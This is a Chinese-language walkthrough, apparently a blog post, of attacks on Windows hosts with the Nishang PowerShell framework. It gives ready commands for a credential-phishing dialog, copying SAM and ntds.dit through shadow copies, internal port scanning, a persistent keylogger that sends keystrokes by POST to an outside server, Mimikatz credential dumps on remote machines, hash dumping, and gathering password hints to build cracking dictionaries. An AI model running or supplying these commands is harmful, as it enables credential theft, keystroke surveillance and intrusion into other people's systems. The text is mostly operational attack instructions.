Nishang 模块攻击实战
windows 中已导入模块 nishang.psm11.Check-VM检测当前机器是否为一台已知的虚拟机。通过检测已知的虚拟机的指纹信息(如 Hyper-V、VMware、Virtual PC、Virtual Box、Xen、QEMU)来识别。2.Invoke-CredentialsPhish作用:欺骗目标主机的用户,让用户输入密码可更改脚本,不输入正确密码关闭不了对话框,只能强制结束进程。这
windows 中已导入模块 nishang.psm1
1.Check-VM
检测当前机器是否为一台已知的虚拟机。通过检测已知的虚拟机的指纹信息(如 Hyper-V、VMware、Virtual PC、Virtual Box、Xen、QEMU)来识别。
2.Invoke-CredentialsPhish
作用:欺骗目标主机的用户,让用户输入密码
可更改脚本,不输入正确密码关闭不了对话框,只能强制结束进程。这样做成功得到明文的管理员账户密码
3.Copy-VSS
利用 Volume Shadow Copy服务复制sam文件,如果这个脚本运行在了 DC服务器上,ntds.dit 和 SYSTEM hive也能被拷贝出来
copy-vss //直接将文件保存在当前目录下
copy-vss -DestinationDir 路径 //指定保存文件的路径(必须是已经存在的路径)
4.FireBuster FireListener扫描器
用于对内网进行扫描,打开本地监听,然后FireBuster远程传送数据,把包发个FireListener
(FireBuster对内网进行扫描,包发送给FireListener)
FireListener 130-150 //本机设置,监听端口
FireBuster 192.168.110.148 130-150 -Verbose //目标机ip、扫描端口
5.Keylogger 键盘记录
目前为止所见过功能最强大的键盘记录
Get-Help .\nishang\gather\keylogger.ps1 -full //注意keylogger.ps1 相对存放路径
//(1)键盘记录会保存在当前用户 Temp 目录下的 key 文件
.\nishang\gather\keylogger.ps1
dir "\key.log*" /s //寻找key.log文件 (cmd)
找不到当前用户的temp目录,然后通过命令行进行搜索,发现有一个 appdata,又看不到,猜测应该是一个隐藏文件夹,打开控制面板显示隐藏文件夹(文件颜色 相对于 正常文件有点浅),或者通过搜索出来的路径直接访问文件
//(2)-CheckURL参数会检查所给出的网页之中是否包含 -MagicString 后的字符串,如果存在就停止使用记录(MagicString 后面添加不了字符串,如果stopthis存在),跟(1)作用差不多
.\nishang\gather\keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis
//(3)将记录指定发送给一个可以记录Post请求的web服务器
.\nishang\gather\keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis -exfil -ExfilOption WebServer -URL http://192.168.254.226/data/catch.php
//(4)实现持久化记录(重启后依然进行记录)
.\nishang\gather\keylogger.ps1 -persist
生成 key.log 文件后,需要使用 Nishang Utility 中的 Parse_Keys 解析文件,会出现解析后的按键记录(在解析之前,先移动 key 文件到当前的目录)
Parse_keys .\key.log .\parsed.txt //两个文件都是相对路径
(key.log)
(parsed.txt)
6.Invoke-Mimikatz
抓取密码
//(1)Dump 出本机的凭证信息
Invoke-Mimikatz -DumpCreds
//(2)Dump 出远程的两台计算机的凭证信息
Invoke-Mimikatz -DumpCreds -ComputerName @("computer1", "computer2")
//(3)在远程一台机器上运行Mimikatz并执行"privilege::debug exit"
Invoke-Mimikatz -Command "privilege::debug exit" -ComputerName "computer1"
(win10测试,防毒后来关了)
7.Get-PassHashes
这个脚本在 Administrator 的权限下可以 Dump 出密码哈希值,来源于 Metasploit 中的 Power Dump 模块,但在其基础上做出了修改,使得不需要 SYSTEM 权限就可以 Dump
Get-PassHashes
8.获取用户的密码提示信息
这个脚本可以从 Windows 获得用户密码的提示信息,需要有 Administrator 的权限来读取sam hive。可以根据提示信息生成密码字典,能大大提高爆破的成功率。甚至有相当一部分人会将明文密码记录在这个提示信息中
get-PassHints
更多推荐
所有评论(0)